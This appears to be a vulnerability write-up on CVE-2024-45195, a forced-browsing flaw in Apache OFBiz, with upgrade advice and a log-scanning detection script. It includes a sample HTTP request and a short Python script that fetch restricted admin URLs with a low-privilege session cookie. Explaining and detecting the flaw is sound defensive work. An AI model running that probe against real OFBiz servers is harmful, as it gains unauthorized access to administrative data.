CVE-2024-45195 - Direct Request ('Forced Browsing') Vulnerability in Apache OFBiz – How Attackers Could Access Restricted URLs
CVE-2024-45195 is a newly disclosed "Direct Request" or "Forced Browsing" vulnerability that impacts Apache OFBiz—one of the most popular open-source enterprise resource management systems. This security flaw allows attackers to directly access restricted resources (like admin pages or sensitive API endpoints) simply by requesting the correct URL, even though they are not authorized to view them. See the official CVE record.
OFBiz instances before version 18.12.16 are vulnerable, and users should upgrade to at least 18.12.16.
Let's break down how this works, how to replicate it, and what you should do to fix it.
Understanding 'Forced Browsing'
Forced Browsing (in some contexts also referred to as "Insecure Direct Object Reference" or IDOR) happens when an app or server doesn’t properly check whether a user is allowed to view or interact with a specific resource. That means if someone changes the URL or guesses the location of a "hidden" page or API, they might get access—no hacking skills required.
Example Scenario
Let’s say OFBiz has an admin page at /control/admin meant only for administrators. Instead of showing an error when a normal user goes to that URL, the page loads anyway, revealing sensitive information or giving powerful actions to unauthorized users.
Step 1: Authenticate as Any User
Attackers register a normal user or use a low-privileged account.
Step 2: Request Restricted URLs Directly
Attackers simply try direct URLs like:
- /control/ServerHit
- /control/EntitySyncList
- /control/Admin
Example Request
GET /control/ServerHit HTTP/1.1
Host: vulnerable-ofbiz-instance.com
Cookie: JSESSIONID=abcdefgh12345678
If the server responds with a regular 200 OK and the admin dashboard loads, the system has a forced browsing flaw.
Exploit Code Example
Here's a quick Python script (using requests) that tries to access a restricted URL with a normal user's session:
    import requests

    # Replace with a real target and a valid JSESSIONID for an authenticated, low-privilege user
    url = 'https://vulnerable-ofbiz-instance.com/control/ServerHit'
    session_cookie = {'JSESSIONID': 'abcdefgh12345678'}

    # Request the restricted page with the low-privilege session. Redirects are not followed,
    # so a bounce to the login page is not mistaken for a successful 200 response.
    response = requests.get(url, cookies=session_cookie, allow_redirects=False, timeout=10)

    # Per the criterion above: a 200 OK carrying the admin page content means the check is missing
    if response.status_code == 200 and "Server Statistics" in response.text:
        print("Vulnerable! Access granted to restricted admin page.")
    else:
        print("Access denied or not vulnerable.")
Note: You'd need a valid session cookie for an authenticated (but low-privilege) user for the above to work.
Why This Happened
Vulnerabilities like this usually result from a lack of "authorization checks." OFBiz was supposed to enforce access controls on certain URLs, but before version 18.12.16, these checks were missing or too weak in some places.
Mitigation – How to Fix
Upgrade to OFBiz 18.12.16 or later immediately:
The OFBiz project fixed this issue by adding the missing authorization checks. You can read the OFBiz security advisory for official details.
# Example: updating with git
git fetch origin
git checkout release18.12
git pull
# Rebuild OFBiz as per install docs
Also, review your custom plugins/pages and add explicit authorization checks, even after updating.
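Alongside upgrading, it is worth checking whether such requests have already reached your instance. The following is an added example (not part of the original write-up or the OFBiz project) that scans Tomcat/Apache combined-format access log lines for the restricted controller URIs named above; it reports requests that were actually served with 200 and clients that touched several restricted URIs regardless of status, which is the URL-guessing pattern this flaw invites. The URI list, threshold and log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Restricted controller URIs from the write-up (constructed list; extend for your own deployment)
RESTRICTED_URIS = {"/control/ServerHit", "/control/EntitySyncList", "/control/Admin"}

# Combined access log line, e.g.
# 10.0.0.5 - - [04/Sep/2024:10:15:01 +0000] "GET /control/ServerHit HTTP/1.1" 200 5123 "-" "curl/8.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return (ip, method, path without query string, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]
    # Keep only the controller part so a webapp mount prefix (e.g. /webtools/control/Admin) still matches
    idx = path.find("/control/")
    if idx != -1:
        path = path[idx:]
    return m.group("ip"), m.group("method"), path, int(m.group("status"))

def analyze(lines, enum_threshold=2):
    """Two signals: a restricted URI served with 200, and one client requesting many restricted URIs."""
    granted = []                # (ip, path) pairs where the restricted page was actually served
    touched = defaultdict(set)  # ip -> restricted paths requested, whatever the status code
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _method, path, status = parsed
        if path not in RESTRICTED_URIS:
            continue
        touched[ip].add(path)
        if status == 200:
            granted.append((ip, path))
    enumerators = sorted(ip for ip, paths in touched.items() if len(paths) >= enum_threshold)
    return {"granted": granted, "enumerators": enumerators}

# Constructed sample lines (not real traffic): one client probes several restricted URIs
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Sep/2024:10:15:01 +0000] "GET /control/ServerHit HTTP/1.1" 200 5123 "-" "curl/8.0"',
    '10.0.0.5 - - [04/Sep/2024:10:15:02 +0000] "GET /control/EntitySyncList?x=1 HTTP/1.1" 302 0 "-" "curl/8.0"',
    '10.0.0.5 - - [04/Sep/2024:10:15:03 +0000] "GET /webtools/control/Admin HTTP/1.1" 403 312 "-" "curl/8.0"',
    '10.0.0.9 - - [04/Sep/2024:10:16:00 +0000] "GET /control/main HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A 200 for a restricted URI from a session that is not an administrator's is the finding to investigate; a client hitting several restricted URIs with 302/403 responses is a sign of probing even on a patched instance.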
References and Resources
- NVD CVE-2024-45195 entry
- OFBiz Security Page
- Apache OFBiz Project
- About Forced Browsing
- Upgrade Instructions
Conclusion
CVE-2024-45195 is dangerously easy to exploit—attackers just need to know (or guess) URLs. If you run Apache OFBiz, upgrade to 18.12.16 without delay, and always verify that your sensitive URLs are protected with proper access checks.
Timeline
Published on: 09/04/2024 09:15:04 UTC
Last modified on: 09/06/2024 15:35:05 UTC